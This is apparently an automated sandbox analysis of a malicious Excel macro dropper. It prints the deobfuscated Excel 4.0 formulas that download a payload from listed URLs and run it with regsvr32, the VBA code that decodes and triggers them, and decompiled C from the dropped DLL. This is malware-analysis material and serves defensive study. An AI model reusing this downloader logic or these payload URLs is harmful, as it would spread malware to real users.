SET.NAME("wegb","URLM"&v0&"N") Replace("CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0)","?","http://pm.kezto.co.uk/mcluc5u.rar") -> CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0) Replace("SET.NAME("ohgdfww","h"&w00&"llEx"&w00&"cut"&w00)","?","https://datxanhgemskyworldvn.com/vis2005c3.zip") -> SET.NAME("ohgdfww","h"&w00&"llEx"&w00&"cut"&w00) Replace("SET.NAME("wegb","Sh"&w00&"ll")","?","https://dev.decentwebsites.com/n18bqnz9.zip") -> SET.NAME("wegb","Sh"&w00&"ll") Replace("CALL(wegb&o0,"S"&ohgdfww&"A",i0&i0&"CCCC"&i0,0,v0&"p"&w00&"n","r"&w00&"gsvr"&o0," -s "&bb&ab&ba,0,0)","?","http://caledoniehousesitting.com/v7u5m7k4z.rar") -> CALL(wegb&o0,"S"&ohgdfww&"A",i0&i0&"CCCC"&i0,0,v0&"p"&w00&"n","r"&w00&"gsvr"&o0," -s "&bb&ab&ba,0,0) Replace("SET.NAME("b0b",CHAR(101))","?","http://wexfashion.com/k04qkvqu.zip") -> SET.NAME("b0b",CHAR(101)) Replace("SET.NAME("v0","n")","?","https://www.urban-mosaic.com/ana58n.zip") -> SET.NAME("v0","n") Replace("SET.NAME("i0","J")","?","https://viralizi.id/pme1b4.rar") -> SET.NAME("i0","J") Replace("CANCEL.KEY(TRUE)","?","https://www.urban-mosaic.com/ana58n.zip") -> CANCEL.KEY(TRUE) Replace("SET.NAME("w00","\")","?","http://mmogollon.com.mx/hy9x6w.zip") -> SET.NAME("w00","\") Replace("IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE))","?","http://salonprem.ru/op291r.rar") -> IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE)) Replace("SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00)","?","https://uralflex.com/kaf3bihtd.rar") -> SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00) Replace("SET.NAME("o0","32")","?","https://datxanhgemskyworldvn.com/vis2005c3.zip") -> SET.NAME("o0","32") Replace("CANCEL.KEY(TRUE)","?","http://sihtc.gtranzit.com/sgrc47di.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("oo0","?")","?","http://laboratoriostabbler.com/c942pn.rar") -> SET.NAME("oo0","http://laboratoriostabbler.com/c942pn.rar") Replace("SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll")","?","http://cooltcat.com/hiytvys.rar") -> SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll") Replace("SET.NAME("w00",b0b)","?","http://www.maapaaevents.com/g11qoa5.zip") -> SET.NAME("w00",b0b) Replace("SET.NAME("ba",".")","?","http://medicalconsultants.ie/qr2hqhg5o.rar") -> SET.NAME("ba",".") Replace("SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00)","?","http://omescortcargo.com/jzj2gw.zip") -> SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00) Replace("SET.NAME("v0","O")","?","https://gatewayips.com/mu3nv17.zip") -> SET.NAME("v0","O") Replace("SET.NAME("wegb","URLM"&v0&"N")","?","http://inmindppe.com/eb3kd1le.zip") -> SET.NAME("wegb","URLM"&v0&"N") Replace("CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0)","?","https://benditoassociates.com/l7rgi3xyd.zip") -> CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0)
Part of subcall function ecimovert@Module1: Int
Part of subcall function ecimovert@Module1: UBound
Part of subcall function ecimovert@Module1: Rnd
Split
MsgBox
Run	Run("moreP_ab") Run("moreP_ab")

Strings	Decrypted Strings
"!"
""""
"="
"?"
"="
"?"
""""

Line	Instruction	Meta Information
7	Function pagesREviewsd(optional wq as Integer) as Integer
8	Dim O as Integer	executed
8	Dim Oa as Integer
8	ol = 1
9	Sheets(ol).Cells(homepodd, ol).Name = bycilke & "ab"	Cells
10	Dim MiV(44563)
11	For Each sem in ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)	SpecialCells xlCellTypeConstants
12	MiV(sem.value) = Chr(sem.Row)	value Chr Row
13	Next	SpecialCells xlCellTypeConstants
14	For Each nog in MiV
15	govs = govs + nog
16	Next
17	Oa = 9
17	kij = Split(govs, "!")	Split
17	Ada = Split(kij(ol), yellowsto(homepodd))	Split
18	For Each Vo in Ada
19	Sheets(ol).Cells(homepodd, ol).value = "=" & Replace(Vo, "?", ecimovert(Split(kij(0), yellowsto(Oa))))	Cells Replace("SET.NAME("b0b",CHAR(101))","?","http://148.72.88.102/iszvgm.zip") -> SET.NAME("b0b",CHAR(101)) Split executed
20	On Error Resume Next
21	MsgBox (Run("" & bycilke & "ab"))	MsgBox Run("moreP_ab") executed
22	Next
22	Oa = 2
23	End Function

Function yellowsto, APIs: 0, Strings: 3, Number of lines: 6, Relevance: 3.756

Strings	Decrypted Strings
"$"
"]"
"]"

Line	Instruction	Meta Information
33	Function yellowsto(yel as Integer)
34	yellowsto = "$"	executed
35	If yel = 2 Then
35	yellowsto = "]"
35	Endif
36	End Function

Function ecimovert, APIs: 3, Strings: 0, Number of lines: 5, Relevance: 3.755

APIs	Meta Information
Int
UBound
Rnd

Line	Instruction	Meta Information
27	Function ecimovert(nimo as Variant) as String
27	Randomize:	executed
28	df = 2 - 1
28	ecimovert = nimo(Int((UBound(nimo) + df) * Rnd))	Int UBound Rnd
29	End Function

Function bycilke, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings	Decrypted Strings
"moreP_"

Line	Instruction	Meta Information
24	Function bycilke()
25	bycilke = "moreP_"	executed
26	End Function

Function homepodd, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
3	Function homepodd()
4	homepodd = 5 - 3	executed
5	End Function

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Control = "view_1_a, 1, 0, MSForms, MultiPage"

Executed Functions

Subroutine view_1_a_Layout, APIs: 2, Strings: 0, Number of lines: 4, Relevance: 4.504

APIs	Meta Information
Part of subcall function ResizePagess@Sheet1: OnTime
Part of subcall function ResizePagess@Sheet1: Now

Line	Instruction	Meta Information
13	Private Sub view_1_a_Layout(ByVal Index as Long)
14	a = 488	executed
14	ResizePagess
15	End Sub

Subroutine ResizePagess, APIs: 2, Strings: 1, Number of lines: 3, Relevance: 4.503

APIs	Meta Information
OnTime
Now

Strings	Decrypted Strings
"pages""REviewsd"

Line	Instruction	Meta Information
10	Sub ResizePagess()
11	Application.OnTime Now, "pages" & "REviewsd"	OnTime Now executed
12	End Sub

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: regsvr32.exe PID: 2328 Parent PID: 2356 regsvr32.exeCOMMON

Executed Functions

Function 00895150, Relevance: 32.3, APIs: 14, Strings: 4, Instructions: 826
sleepCOMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00895150() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t173;
				signed int _t175;
				signed int _t184;
				signed int _t186;
				signed int _t192;
				signed int _t194;
				void* _t197;
				signed int _t205;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr* _t238;
				void* _t253;
				void* _t263;
				intOrPtr _t266;
				signed int _t276;
				signed int _t280;
				void* _t295;
				intOrPtr* _t296;
				signed int _t299;
				unsigned int _t303;
				intOrPtr _t306;
				signed short* _t307;
				signed int _t310;
				signed int _t327;
				signed int _t328;
				signed int _t333;
				char* _t341;
				char _t343;
				signed int _t354;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				signed int _t374;
				void* _t379;
				signed int _t380;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t430;
				intOrPtr* _t438;
				signed int _t453;
				signed int _t455;
				signed int _t458;
				signed int _t490;
				signed int _t492;
				signed int _t504;
				signed int _t505;
				signed int _t525;
				signed int _t534;
				void* _t539;
				signed int _t540;
				signed int _t548;
				intOrPtr* _t549;
				void* _t552;
				intOrPtr _t555;
				intOrPtr _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				intOrPtr* _t562;

				_push(_t537);
				_push(_t533);
				_t562 = _t561 - 0x204;
				_push(1);
				E008A7980(_t562 + 0x12c);
				_t173 = E008A15C0(0xa1310f65, 0x755128fe);
				if(_t173 == 0) {
					 *0x8cb1b5 = 0;
					 *0x8cb1ad = 0;
					 *0x8cb1b1 = 0;
					 *0x8cb1b9 = 0;
					 *0x8cb1bd = 0;
					__eflags =  *0x8cb026 & 0x000000ff;
					if(( *0x8cb026 & 0x000000ff) != 0) {
						E008B5CB0(_t562 + 0xdc, 3, 0x28, 0x64);
						_t382 = 0;
						__eflags = 0;
						_t557 = _t562 + 0x1e4;
						while(1) {
							L4:
							E008B5CB0(_t557, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1e4));
							Sleep(0xa);
							E008B0B10(_t557);
							_t382 = _t382 + 1;
							__eflags = _t382 - 0xbebbe7c;
							if(_t382 >= 0xbebbe7c) {
								break;
							} else {
								goto L5;
							}
							while(1) {
								L5:
								__eflags = _t382 - 0x137b;
								if(_t382 < 0x137b) {
									goto L4;
								}
								_t382 = _t382 + 1;
								__eflags = _t382 - 0xbebbe7c;
								if(_t382 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L8;
							}
						}
						L8:
						_t383 = 0;
						__eflags = 0;
						_t558 = _t562 + 0x1ec;
						while(1) {
							L9:
							E008B5CB0(_t558, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1ec));
							Sleep(0xa);
							E008B0B10(_t558);
							_t383 = _t383 + 1;
							__eflags = _t383 - 0xbebbe7c;
							if(_t383 >= 0xbebbe7c) {
								break;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								__eflags = _t383 - 0x137b;
								if(_t383 < 0x137b) {
									goto L9;
								}
								_t383 = _t383 + 1;
								__eflags = _t383 - 0xbebbe7c;
								if(_t383 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L13;
							}
						}
						L13:
						_t384 = 0;
						__eflags = 0;
						_t559 = _t562 + 0x1f4;
						while(1) {
							L14:
							E008B5CB0(_t559, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1f4));
							Sleep(0xa);
							E008B0B10(_t559);
							_t384 = _t384 + 1;
							__eflags = _t384 - 0xbebbe7c;
							if(_t384 >= 0xbebbe7c) {
								break;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								__eflags = _t384 - 0x137b;
								if(_t384 < 0x137b) {
									goto L14;
								}
								_t384 = _t384 + 1;
								__eflags = _t384 - 0xbebbe7c;
								if(_t384 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L18;
							}
						}
						L18:
						_t385 = 0;
						__eflags = 0;
						_t560 = _t562 + 0x1fc;
						while(1) {
							L19:
							E008B5CB0(_t560, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1fc));
							Sleep(0xa);
							E008B0B10(_t560);
							_t385 = _t385 + 1;
							__eflags = _t385 - 0xbebbe7c;
							if(_t385 >= 0xbebbe7c) {
								break;
							} else {
								goto L20;
							}
							while(1) {
								L20:
								__eflags = _t385 - 0x137b;
								if(_t385 < 0x137b) {
									goto L19;
								}
								_t385 = _t385 + 1;
								__eflags = _t385 - 0xbebbe7c;
								if(_t385 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L23;
							}
						}
						L23:
						E008B0B10(_t562 + 0xd4);
					}
					_push(0x755aa3f0);
					_t175 = E008A7560();
					__eflags = _t175;
					if(_t175 != 0) {
						_t341 = E008A15C0(0x588ab3ea, 0x1be15feb);
						__eflags =  *_t341 - 0xe9;
						if( *_t341 == 0xe9) {
							_t150 =  *((intOrPtr*)(_t341 + 1)) + 5; // 0x5
							_t379 = _t341 + _t150;
							_t490 = E008A15C0(0x588ab3ea, 0x3b4caff7);
							__eflags = _t490;
							if(_t490 == 0) {
								L139:
								_t555 =  *0x8c9414; // 0x3f7883
								_t343 =  *0x8c941a; // -16
								 *((intOrPtr*)(_t562 + 0xdc)) = _t555;
								 *((short*)(_t562 + 0xe0)) =  *0x8c9418 & 0x0000ffff;
								 *((char*)(_t562 + 0xe2)) = _t343;
								_t537 =  *(_t562 + 0x6c);
								_t556 =  *((intOrPtr*)(_t562 + 0x78));
								while(1) {
									_push(0x3f);
									_push(7);
									_push(_t562 + 0xe4);
									_t380 = E008A0DA0(_t537, _t556);
									__eflags = _t380;
									if(_t380 == 0) {
										goto L26;
									}
									 *(_t562 + 0xec) = _t380;
									 *((intOrPtr*)(_t562 + 0xf0)) = 0x10;
									_t556 = _t556 -  ~_t537 + _t380 + 7;
									 *((intOrPtr*)(_t562 + 0xf4)) = 0x40;
									_t161 = _t380 + 7; // 0x7
									_t537 = _t161;
									_t492 = E008A15C0(0x588ab3ea, 0x649746ec);
									__eflags = _t492;
									if(_t492 != 0) {
										_t533 = _t562 + 0xf0;
										 *_t492(0xffffffff, _t562 + 0xec, _t562 + 0xf0,  *((intOrPtr*)(_t562 + 0xf8)), _t562 + 0xf4);
									}
									 *((char*)(_t380 + 5)) = 0x90;
									 *((char*)(_t380 + 4)) = 0x90;
									_t525 = E008A15C0(0x588ab3ea, 0x649746ec);
									__eflags = _t525;
									if(_t525 != 0) {
										_t533 = _t562 + 0xec;
										 *_t525(0xffffffff, _t562 + 0xec, _t562 + 0xf0,  *((intOrPtr*)(_t562 + 0xf8)), _t562 + 0xf4);
									}
								}
								goto L26;
							} else {
								_t354 =  *_t490(0xffffffff, _t379, 0, _t562 + 0x6c, 0x1c, 0);
								__eflags = _t354;
								if(_t354 != 0) {
									goto L26;
								} else {
									goto L139;
								}
							}
							goto L145;
						}
					}
					L26:
					E00891270(_t533, _t537);
					 *((intOrPtr*)(_t562 + 0x12c)) = 0x2800;
					_push(0x2800);
					E008B9350(_t562 + 0xfc);
					_t548 = E008B9640(_t562 + 0xfc, 0);
					_t504 = E008A15C0(0xd93f3271, 0xa1ee59b);
					__eflags = _t504;
					if(_t504 != 0) {
						 *_t504(_t548, _t562 + 0x12c); // executed
					}
					__eflags = _t548;
					if(_t548 != 0) {
						_t537 = 0x4b005452;
						do {
							__eflags =  *((intOrPtr*)(_t548 + 0x194)) - _t537 | ( *(_t548 + 0x198) & 0x0000ffff) - 0x000031a1;
							if(( *((intOrPtr*)(_t548 + 0x194)) - _t537 | ( *(_t548 + 0x198) & 0x0000ffff) - 0x000031a1) == 0) {
								E00895150();
							}
							_t548 =  *_t548;
							__eflags = _t548;
						} while (_t548 != 0);
					}
					E008B9510(_t562 + 0xf8);
					E008A8810(_t562 + 0x108, 0);
					 *0x8cb1c8 = _t562 + 0x108;
					_t184 = E008A15C0(0xa1310f65, 0xe10858ef);
					__eflags = _t184;
					if(_t184 == 0) {
						__eflags = 0;
						_t186 = E008A15C0(0x1b47f147, 0x4c00b324);
						__eflags = _t186;
						if(_t186 == 0) {
							 *0x8cb1d0 = 0;
							_t549 = E008A3930(0, 0, _t533, _t537);
							__eflags =  *_t549 - 0x10;
							if( *_t549 < 0x10) {
								E00895150();
							}
							E00896020(0);
							E008A8810(_t562 + 0x114, 0x200);
							_t505 = E008A15C0(0xa1310f65, 0xc4d11e8a);
							__eflags = _t505;
							if(_t505 != 0) {
								_t333 =  *(_t562 + 0x114) >> 1;
								__eflags = _t333;
								 *_t505(0,  *(_t562 + 0x114), _t333);
							}
							E008A2580(_t562 + 0x118, _t533, _t537);
							_t192 = E008A9C70(_t562 + 0x114, _t533,  *((intOrPtr*)(_t562 + 0x118)));
							__eflags = _t192;
							if(_t192 == 0) {
								E008A2780(_t562 + 0xe4, _t533, _t537);
								_t194 = E008A9C70(_t562 + 0x114, _t533,  *((intOrPtr*)(_t562 + 0xe4)));
								__eflags = _t194;
								if(_t194 == 0) {
									E008A2580(_t562 + 0xb4, _t533, _t537);
									_t537 = _t562 + 0x98;
									E008AD980(_t562 + 0xbc, _t562 + 0x98, 0x5c);
									_t197 = E008B7600(_t562 + 0x98, 2);
									E0089AC00(_t562 + 0xbc, 6);
									E008A8CC0(_t197,  *((intOrPtr*)(_t562 + 0xbc)));
									E008A8CA0(_t562 + 0xbc);
									E008B89F0(_t537, _t562 + 0x124, 0x5c);
									E008B8910(_t537, _t533, _t537);
									E008A8CA0(_t562 + 0xb4);
									_t205 = E008A9C70(_t562 + 0x114, _t533,  *((intOrPtr*)(_t562 + 0x120)));
									__eflags = _t205;
									_t47 = _t205 > 0;
									__eflags = _t47;
									_t369 = 0 | _t47;
									E008A8CA0(_t562 + 0x120);
								} else {
									_t369 = 1;
								}
								E008A8CA0(_t562 + 0xe4);
								E008A8CA0(_t562 + 0x118);
								__eflags = _t369;
								if(_t369 == 0) {
									_t370 = 0;
									__eflags = 0;
								} else {
									goto L48;
								}
							} else {
								E008A8CA0(_t562 + 0x118);
								L48:
								_t370 = 1;
							}
							E0089AC00(_t562 + 0x120, 2);
							E008AD980(_t562 + 0x128, _t562 + 0x130, 0x7e);
							E008A8CA0(_t562 + 0x120);
							__eflags =  *(_t562 + 0x130);
							if( *(_t562 + 0x130) > 0) {
								 *_t562 = _t549;
								__eflags = 0;
								_t534 = _t562 + 0x130;
								while(1) {
									L52:
									_t327 = E008A15C0(0xa1310f65, 0xf3af54a7);
									__eflags = _t327;
									if(_t327 != 0) {
										LoadLibraryW( *(E008B7600(_t534, _t537))); // executed
									}
									_t328 =  *(_t562 + 0x130);
									while(1) {
										L55:
										_t537 = 1;
										__eflags = 1 - _t328;
										if(1 >= _t328) {
											break;
										}
										__eflags = 1 - 4;
										if(1 != 4) {
											goto L52;
										} else {
											_t508 =  *0x8cb02a & 0x000000ff;
											__eflags = ( *0x8cb02a & 0x000000ff) - 2;
											if(( *0x8cb02a & 0x000000ff) == 2) {
												continue;
											} else {
												while(1) {
													L52:
													_t327 = E008A15C0(0xa1310f65, 0xf3af54a7);
													__eflags = _t327;
													if(_t327 != 0) {
														LoadLibraryW( *(E008B7600(_t534, _t537))); // executed
													}
													_t328 =  *(_t562 + 0x130);
													goto L55;
												}
											}
										}
										goto L60;
									}
									_t549 =  *_t562;
									goto L60;
								}
							}
							L60:
							__eflags =  *((intOrPtr*)(_t549 + 0x2c)) - 2;
							if( *((intOrPtr*)(_t549 + 0x2c)) != 2) {
								__eflags =  *0x8cb028 & 0x000000ff;
								if(( *0x8cb028 & 0x000000ff) == 0) {
									__eflags =  *0x8cb265 & 0x000000ff;
									if(( *0x8cb265 & 0x000000ff) == 0) {
										__eflags =  *0x8cb1cc - 1;
										if( *0x8cb1cc != 1) {
											_t306 =  *0x8cb1d0; // 0x3277c8
											_t307 =  *(_t306 + 4);
											_t508 =  *_t307 & 0x0000ffff;
											__eflags = ( *_t307 & 0x0000ffff) - 0x2d;
											if(( *_t307 & 0x0000ffff) != 0x2d) {
												E008A8AB0(_t562 + 0xcc, _t307, 0);
												_push(0x80);
												_push(0);
												E008BA4E0(_t562 + 0x68, __eflags,  *((intOrPtr*)(_t562 + 0xd0)), 1);
												_t310 = E008BBEA0(_t562 + 0x64, _t508, _t537);
												__eflags = _t310;
												if(_t310 == 0) {
													__eflags =  *((char*)(_t562 + 0x68));
													if( *((char*)(_t562 + 0x68)) != 0) {
														E008BBE30(_t562 + 0x64, _t537);
													}
													E008A8CA0(_t562 + 0x58);
													_t540 = 0;
													__eflags = 0;
													while(1) {
														__eflags = E008BA730(_t562 + 0xc4, _t508);
														if(__eflags == 0) {
															break;
														}
														E008A22A0(0x64, _t508);
														_t540 = _t540 + 1;
														__eflags = _t540 - 0x64;
														if(__eflags < 0) {
															continue;
														}
														break;
													}
													_t537 = _t562 + 0xcc;
													do {
														E008AAE80(_t562 + 0xcc, __eflags, _t537, 0x5c);
														E008A8CC0(_t562 + 0xc8,  *(_t562 + 0xcc));
														E008A8CA0(_t537);
														__eflags = E008BA730(_t562 + 0xc4, _t508);
													} while (__eflags == 0);
												} else {
													__eflags =  *((char*)(_t562 + 0x68));
													if( *((char*)(_t562 + 0x68)) != 0) {
														E008BBE30(_t562 + 0x64, _t537);
													}
													E008A8CA0(_t562 + 0x58);
												}
												E008A8CA0(_t562 + 0xc4);
											}
										}
									}
								}
								__eflags = ( *0x8cb02a & 0x000000ff) - 2;
								if(( *0x8cb02a & 0x000000ff) == 2) {
									L89:
									_t215 =  *0x8cb1ad; // 0xec1f98
									__eflags = _t215;
									if(_t215 == 0) {
										L91:
										_t216 =  *0x8cb1ad; // 0xec1f98
										__eflags = _t216;
										if(_t216 == 0) {
											_push(0x10);
											_t217 = E008A1030();
											_t562 = _t562 + 4;
											__eflags = _t217;
											if(_t217 != 0) {
												_push(0);
												_t218 = E008B9350(_t217);
											} else {
												_t218 = 0;
											}
											 *0x8cb1ad = _t218;
										}
										_t537 =  *0x8cb1ad; // 0xec1f98
										__eflags = ( *0x8cb02a & 0x000000ff) - 1;
										if(( *0x8cb02a & 0x000000ff) == 1) {
											_t508 = 0x18f8c844;
											_t534 = _t562 + 0x28;
											E00896AD0(_t370, _t534, 0x18f8c844, _t534, _t537, 1, 0); // executed
											_push(_t534);
											E008B9520(_t537);
											E008B9510(_t534);
										} else {
											E008B9710(_t537, 0x8cb02d,  *0x8cb02b & 0x0000ffff);
										}
									} else {
										_t455 =  *0x8cb1ad; // 0xec1f98
										_t280 = E008B9660(_t455);
										__eflags = _t280;
										if(_t280 != 0) {
											goto L91;
										}
									}
									_t223 =  *0x8cb1b1; // 0x0
									__eflags = _t223;
									if(_t223 == 0) {
										L97:
										_t224 =  *0x8cb1b1; // 0x0
										__eflags = _t224;
										if(_t224 == 0) {
											_push(0x10);
											_t225 = E008A1030();
											_t562 = _t562 + 4;
											__eflags = _t225;
											if(_t225 != 0) {
												_push(0);
												_t226 = E008B9350(_t225);
											} else {
												_t226 = 0;
											}
											 *0x8cb1b1 = _t226;
										}
										_t534 =  *0x8cb1b1; // 0x0
										__eflags = ( *0x8cb02a & 0x000000ff) - 1;
										if(( *0x8cb02a & 0x000000ff) == 1) {
											_t508 = 0x11041f01;
											E00896AD0(_t370, _t562 + 0x38, 0x11041f01, _t534, _t537, 1, 1);
											_push(_t562 + 0x38);
											E008B9520(_t534);
											E008B9510(_t562 + 0x38);
											_t233 = E008B9650(_t534);
											__eflags = _t233;
											if(_t233 != 0) {
												_t508 = 0xd3ef7577;
												E00896AD0(_t370, _t562 + 8, 0xd3ef7577, _t534, _t537, 0, 0);
												E008B9510(_t562);
											}
										} else {
											_t537 =  *0x8cb1c4; // 0x890000
											__eflags =  *((char*)(E008A3930(_t370, 0, _t534, _t537) + 0xb)) - 0x20;
											_t517 =  ==  ? 0x7e839a6 : 0x93fc68d6;
											_t508 = _t537;
											E00899090(_t562 + 0x88, _t537,  ==  ? 0x7e839a6 : 0x93fc68d6);
											_push(_t562 + 0x88);
											E008B9520(_t534);
											E008B9510(_t562 + 0x88);
										}
									} else {
										_t453 =  *0x8cb1b1; // 0x0
										_t276 = E008B9660(_t453);
										__eflags = _t276;
										if(_t276 != 0) {
											goto L97;
										}
									}
									_t234 =  *((intOrPtr*)(_t549 + 0x2c));
									__eflags = _t234 - 3;
									if(_t234 == 3) {
										__eflags =  *0x8cb1cc - 3;
										if( *0x8cb1cc == 3) {
											_t235 =  *0x8cb1d0; // 0x3277c8
											E008A8CC0(_t562 + 0x10c,  *((intOrPtr*)(_t235 + 8)));
										}
										_t371 = _t562 + 0x48;
										E008A8810(_t562 + 0x48, 0);
										_t238 = E008A9890(_t371, _t562 + 0x48, _t508, _t534, _t537, _t371, 0x8c9428,  *((intOrPtr*)(_t549 + 0x2c)));
										E008B0220(_t562 + 0x110,  *_t238, 0);
										E008A8CA0(_t371);
										E00898180(_t537);
									} else {
										__eflags = _t234 - 5;
										if(_t234 != 5) {
											__eflags = _t234 - 6;
											if(__eflags == 0) {
												_t430 = _t562 + 0xa4;
												 *_t430 = 0;
												 *((intOrPtr*)(_t430 + 4)) = 0;
												 *((intOrPtr*)(_t430 + 8)) = 0;
												 *((intOrPtr*)(_t430 + 0xc)) = 0;
												E008A5B60(_t370, _t430, _t534, _t537, __eflags);
												E00896740(_t562 + 0xa4);
												E008A1350(0x12);
												__eflags =  *(_t562 + 0xa8);
												if( *(_t562 + 0xa8) > 0) {
													_t373 = 0;
													__eflags = 0;
													do {
														_t253 = E008C2B00(_t562 + 0xa8, _t373);
														__eflags =  *((char*)(_t253 + 0x3c));
														if( *((char*)(_t253 + 0x3c)) == 0) {
															E00892A40(_t562 + 0x50, _t253);
															E008A8CA0(_t562 + 0x50);
														}
														_t373 = _t373 + 1;
														__eflags = _t373 -  *(_t562 + 0xa8);
													} while (_t373 <  *(_t562 + 0xa8));
												}
												E008C2970(_t370, _t562 + 0xa4, _t534);
												_t434 =  *(_t562 + 0xb0);
												__eflags =  *(_t562 + 0xb0);
												if( *(_t562 + 0xb0) != 0) {
													E00892A20(_t434, 1);
												}
											}
										} else {
											__eflags = _t370;
											if(_t370 == 0) {
												__eflags =  *0x8cb1cc - 1;
												if(__eflags <= 0) {
													L106:
													_t438 = _t562 + 0x18;
													 *_t438 = 0;
													 *((intOrPtr*)(_t438 + 4)) = 0;
													 *((intOrPtr*)(_t438 + 8)) = 0;
													 *((intOrPtr*)(_t438 + 0xc)) = 0;
													E008A5B60(_t370, _t438, _t534, _t537, __eflags);
													__eflags = ( *0x8cb029 & 0x000000ff) - 1;
													E00897DB0(_t562 + 0x18, 0 | ( *0x8cb029 & 0x000000ff) - 0x00000001 > 0x00000000);
													__eflags =  *0x8cb029 & 0x000000ff;
													if(( *0x8cb029 & 0x000000ff) != 0) {
														E008A1350(0x12);
														__eflags =  *(_t562 + 0x1c);
														if( *(_t562 + 0x1c) > 0) {
															_t374 = 0;
															__eflags = 0;
															do {
																_t263 = E008C2B00(_t562 + 0x1c, _t374);
																__eflags =  *((char*)(_t263 + 0x3c));
																if( *((char*)(_t263 + 0x3c)) == 0) {
																	E00892A40(_t562 + 0x10, _t263);
																	E008A8CA0(_t562 + 0x10);
																}
																_t374 = _t374 + 1;
																__eflags = _t374 -  *(_t562 + 0x1c);
															} while (_t374 <  *(_t562 + 0x1c));
														}
													}
													E008C2970(_t370, _t562 + 0x18, _t534);
													_t441 =  *(_t562 + 0x24);
													__eflags =  *(_t562 + 0x24);
													if( *(_t562 + 0x24) != 0) {
														E00892A20(_t441, 1);
													}
												} else {
													_t266 =  *0x8cb1d0; // 0x3277c8
													__eflags = ( *( *(_t266 + 4)) & 0x0000ffff) - 0x2d;
													if(__eflags != 0) {
														goto L106;
													}
												}
											}
										}
									}
									E008B8910(_t562 + 0x130, _t534, _t537);
									E008A8CA0(_t562 + 0x110);
									E008A8CA0(_t562 + 0x108);
									E008A7A70(_t562 + 0x128);
									__eflags = 0;
									return 0;
								} else {
									__eflags =  *0x8cb027 & 0x000000ff;
									if(( *0x8cb027 & 0x000000ff) == 0) {
										goto L89;
									} else {
										__eflags = _t370;
										if(_t370 != 0) {
											goto L89;
										} else {
											__eflags =  *((char*)(_t549 + 0xb)) - 0x20;
											_t519 =  ==  ? 0x7fe7dfa2 : 0xfd81b916;
											E008961B0(_t562 + 0x3c,  ==  ? 0x7fe7dfa2 : 0xfd81b916,  *((char*)(_t549 + 0xb)) - 0x20);
											E008A8810(_t562 + 0x18, 0x200);
											_t458 = E008A15C0(0xa1310f65, 0xc4d11e8a);
											__eflags = _t458;
											if(__eflags != 0) {
												_t303 =  *(_t562 + 0x18) >> 1;
												__eflags = _t303;
												_t519 =  *0x8cb1c4; // 0x890000
												 *_t458(_t519,  *(_t562 + 0x18), _t303);
											}
											_push(0x80);
											_push(0);
											E008BA4E0(_t562 + 0x10, __eflags,  *((intOrPtr*)(_t562 + 0x20)), 1);
											E008BA520(_t562 + 8, _t519, _t562 + 0x1c, 0);
